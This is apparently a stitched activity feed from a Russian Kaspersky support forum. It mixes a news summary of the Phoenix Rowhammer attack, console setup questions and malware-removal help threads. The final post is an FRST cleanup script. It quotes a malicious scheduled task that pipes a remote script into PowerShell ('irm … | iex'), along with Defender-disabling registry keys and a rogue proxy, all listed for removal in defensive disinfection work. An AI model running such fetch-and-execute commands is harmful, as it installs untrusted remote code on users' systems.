Активность

В реестре ОС.

А, где находится ? Получается Касперский разработчики придумали , "принудительное" установка до поверх версии? В цели заботы и безопасности , верно?

В сентябре 2025 года исследователи из Швейцарской высшей технической школы в Цюрихе опубликовали научную работу, в которой предложили атаку Phoenix — модификацию атаки Rowhammer, работающую против модулей памяти DDR5. Авторы работы не только показали эффективность новой атаки против 15 исследованных модулей памяти, но и предложили целых три сценария ее использования на практике: для чтения и записи данных из оперативной памяти, для кражи из оперативной памяти приватного ключа шифрования и для обхода средств защиты Linux-утилиты sudo с целью эскалации привилегий. Краткая история атак Rowhammer Чтобы разобраться в этом достаточно непростом исследовании, придется немного (без фанатизма) углубиться в историю атак Rowhammer. Впервые атака Rowhammer была описана в 2014 году в научной работе. Тогда ученые из американского университета Карнеги-Меллона и компании Intel показали, как регулярные обращения к ряду ячеек памяти могут вызывать смену значений в соседнем ряде. А там, к примеру, могут храниться какие-то критически важные данные, изменение которых может привести к нежелательным последствиям (например, повышению привилегий). Возможно, это из-за того, что каждая ячейка в микросхеме памяти представляет собой конденсатор, простейший элемент, способный какое-то (довольно короткое) время хранить электрический заряд. Из-за этого такая память является энергозависимой — выключаешь компьютер или сервер, и данные пропадают. Из-за этого же заряд в ячейках нужно регулярно, с достаточно высокой частотой, обновлять — даже если к этим областям памяти никто не обращается. Ячейки памяти не существуют сами по себе — они построены в ряды и колонны и соединены между собой. Из-за этого может возникать ситуация, когда обращение к ряду ячеек может затрагивать соседний ряд — да так, что обновление в одном ряду повреждает данные в другом. Долгое время этот эффект был известен только разработчикам модулей памяти, которые по мере сил боролись с ним с целью повышения надежности. Но минимизация и неизбежное уплотнение ячеек, то есть уменьшение расстояния между ними, привели к тому, что эффект «простукивания рядов» стало возможно использовать в реальных атаках. View the full article

Нет, судя по описанию. Но он дома и не нужен )

wpa-3 не поддерживает?

Сценарий: Обновить ОС Linux mint до актуальной версии. После обновления наблюдается некритичная проблема с обновлением баз продукта - при включении ПО, сразу после старта антивируса (независимо от того подклчен ПК к сети или нет) открываем окно антивируса и видим что в разделе обновление продукт пишет что якобы менее минуты назад обновил базы.

https://support.kaspersky.ru/ksc/15.1/203901

и отключить его нельзя. Штатными методами по крайней мере.

Обновление включено по-умолчанию.

Поздравляю!

Хорошо только не сегодня

Добрый день. На ноутбуке заметил просадку фпс в играх. Заметил нагрузку на процессор (спадает спустя секунду), вентиляторы вообще не крутились. Переустановил систему. После переустановки нагрузка на процессор осталась и вентиляторы начали крутить в отсечку. Также судя по всему в системе прописан скрытый администратор. После неудачных попыток вернуть контроль над ноутбуком, решил проверить рабочий пк (пишу с него). На рабочем пк обнаружилась та же проблема. Логи прикрепляю. CollectionLog-2025.10.03-15.40.zip

Исправьте по возможности: Контроль учётных записей пользователя включен Запрос на повышение прав для администраторов отключен ^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^ Так ли страшен контроль учетных записей (UAC)? Брандмауэр Защитника Windows (mpssvc) - Служба работает Отключен доменный профиль Брандмауэра Windows Отключен общий профиль Брандмауэра Windows Отключен частный профиль Брандмауэра Windows AMD Software v.25.9.1 Внимание! Скачать обновления Git v.2.50.1 Внимание! Скачать обновления Microsoft Visual Studio Code (User) v.1.104.0 Внимание! Скачать обновления 7-Zip 24.09 (x64) v.24.09 Внимание! Скачать обновления ^Удалите старую версию, скачайте и установите новую.^ WinRAR 7.11 (64-разрядная) v.7.11.0 Внимание! Скачать обновления Discord v.1.0.9188 Внимание! Скачать обновления AmneziaVPN v.4.8.7.2 Внимание! Скачать обновления Java 8 Update 51 (64-bit) v.8.0.510 Внимание! Скачать обновления ^Удалите старую версию и установите новую (jre-8u461-windows-x64.exe - Windows Offline (64-bit))^ Zen Browser (x64 en-US) v.1.16b Внимание! Скачать обновления Google Chrome v.140.0.7339.208 Внимание! Скачать обновления ^Проверьте обновления через меню Справка - О браузере Google Chrome!^ Читайте Рекомендации после удаления вредоносного ПО

А подключиться так: https://IP_адрес_сервера_администрирования:8080 не пробовали? )

SecurityCheck.txt

Отлично! В завершение, пожалуйста: 1. Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите. Компьютер перезагрузится. Остальные утилиты лечения и папки можно просто удалить. 2. Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.Запустите из меню по щелчку правой кнопки мыши Запустить от имени администратораЕсли увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работуДождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txtЕсли Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txtПрикрепите этот файл к своему следующему сообщению.

Спасибо огромное,в kvrt обнаружений не было

При развёртывании KSC на Windows установил так же веб-консоль. При первичной настройки веб-консоли был указан адрес 127.0.0.1 и порт 8080. Как мне изменить этот ip адрес на адрес интерфейса, чтобы веб-консоль была доступна для других устройств в сети?

Сделайте полную проверку с помощью KVRT. Если будут обнаружения, папку C:\KVRT2020_Data\Reports упакуйте в архив и прикрепите к следующему сообщению. p.s. Вы напрасно выполняли скрипты, написанные для других пользователей. Скрипты в этом разделе пишутся индивидуально и, выполняя чужой, в лучшем случае ничего не произойдёт, а в худшем вы рискуете повредить систему.

Fixlog.txtВот файл

Экспорт политики KES пришлите под действием которой находится этот хост.

Исправьте по возможности: Расширенная поддержка закончилась Внимание! Скачать обновления ^Корпоративные версии обновляются установкой с DVD или Flash-носителя соответствующей редакции. На устройстве может отсутствовать возможность получать обновления, если его оборудование несовместимо, на нем нет актуальных драйверов или истек срок его поддержки, предоставляемой поставщиком вычислительной техники (OEM).^ Microsoft Office LTSC профессиональный плюс 2021 - ru-ru v.16.0.14332.20493 Внимание! Скачать обновления ^Инструкция по обновлению Microsoft Office.^ NVIDIA GeForce Experience 3.27.0.120 v.3.27.0.120 Внимание! Скачать обновления Данная программа больше не поддерживается разработчиком. Рекомендуется использовать Приложение NVIDIA. AnyDesk v.ad 9.0.7 Внимание! Скачать обновления Ghostscript GPL 8.64 (Msi Setup) v.8.64 Внимание! Скачать обновления ^Удалите старую версию, скачайте и установите новую.^ Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.40.33810 v.14.40.33810.0 Внимание! Скачать обновления Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.40.33810 v.14.40.33810.0 Внимание! Скачать обновления 7-Zip 23.01 (x64) v.23.01 Внимание! Скачать обновления ^Удалите старую версию, скачайте и установите новую.^ Krita (x64) 5.2.3 (git 68d178c) v.5.2.3.100 Внимание! Скачать обновления Java 8 Update 401 (64-bit) v.8.0.4010.10 Внимание! Скачать обновления ^Удалите старую версию и установите новую (jre-8u461-windows-x64.exe - Windows Offline (64-bit))^ Adobe Acrobat (64-bit) v.25.001.20693 Внимание! Скачать обновления ^Проверьте обновления через меню Справка - Проверить обновления!^ Google Chrome v.141.0.7390.54 Внимание! Скачать обновления ^Проверьте обновления через меню Справка - О браузере Google Chrome!^ Читайте Рекомендации после удаления вредоносного ПО

SecurityCheck.txt

Исправьте по возможности: Контроль учётных записей пользователя включен Запрос на повышение прав для администраторов отключен ^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^ Так ли страшен Контроль учётных записей Paint.NET v.5.1.7 Внимание! Скачать обновления ---------------------------- [ UnwantedApps ] ----------------------------- Кнопки сервисов Яндекса на панели задач v.3.7.9.0 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии. На заметку - Рекомендации после удаления вредоносного ПО

Здравствуйте! Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены. Отключите до перезагрузки антивирус. Выделите следующий код: Start:: CloseProcesses: SystemRestore: On CreateRestorePoint: HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiSpyware] Ограничение <==== ВНИМАНИЕ HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiVirus] Ограничение <==== ВНИМАНИЕ HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ Task: {9CE57D0D-15D3-4459-9FAE-F10CD6294626} - System32\Tasks\Microsoft\Office\Office Persistent Activation => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [454656 2025-09-10] (Microsoft Windows -> Microsoft Corporation) -> -Command "irm hxxps://activate.techias.co.uk/ | iex" <==== ВНИМАНИЕ ProxyServer: [S-1-5-21-3259035200-1569438540-2830552035-1001] => hxxp://127.0.0.1:12334 RemoveProxy: CHR StartupUrls: Default -> "hxxp://mypoisk.su/" S3 PDFWKRNL; \??\C:\WINDOWS\SystemTemp\USBCPDFW\pdfwkrnl.sys [X] AlternateDataStreams: C:\WINDOWS\tracing:? [16] HKU\S-1-5-21-3259035200-1569438540-2830552035-1001\Software\Classes\regfile: <==== ВНИМАНИЕ HKU\S-1-5-21-3259035200-1569438540-2830552035-1001\Software\Classes\.reg: => <==== ВНИМАНИЕ HKU\S-1-5-21-3259035200-1569438540-2830552035-1001\Software\Classes\.bat: => <==== ВНИМАНИЕ HKU\S-1-5-21-3259035200-1569438540-2830552035-1001\Software\Classes\.cmd: => <==== ВНИМАНИЕ FirewallRules: [{fceb0998-b671-4fdc-95b3-eb458e687d28}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{a1d0f5ea-3f97-4a01-a4af-e4353d001be9}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{ADB0A096-466F-40C0-A130-4BED1EBC728E}] => (Allow) C:\Users\Shieteu\AppData\Roaming\BitTorrent\BitTorrent.exe => Нет файла FirewallRules: [{BD201553-3891-4759-9E80-4A098C532495}] => (Allow) C:\Users\Shieteu\AppData\Roaming\BitTorrent\BitTorrent.exe => Нет файла EmptyTemp: Reboot: End:: Скопируйте выделенный текст (правой кнопкой - Копировать). Запустите FRST (FRST64) от имени администратора. Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению. Компьютер будет перезагружен автоматически. Подробнее читайте в этом руководстве.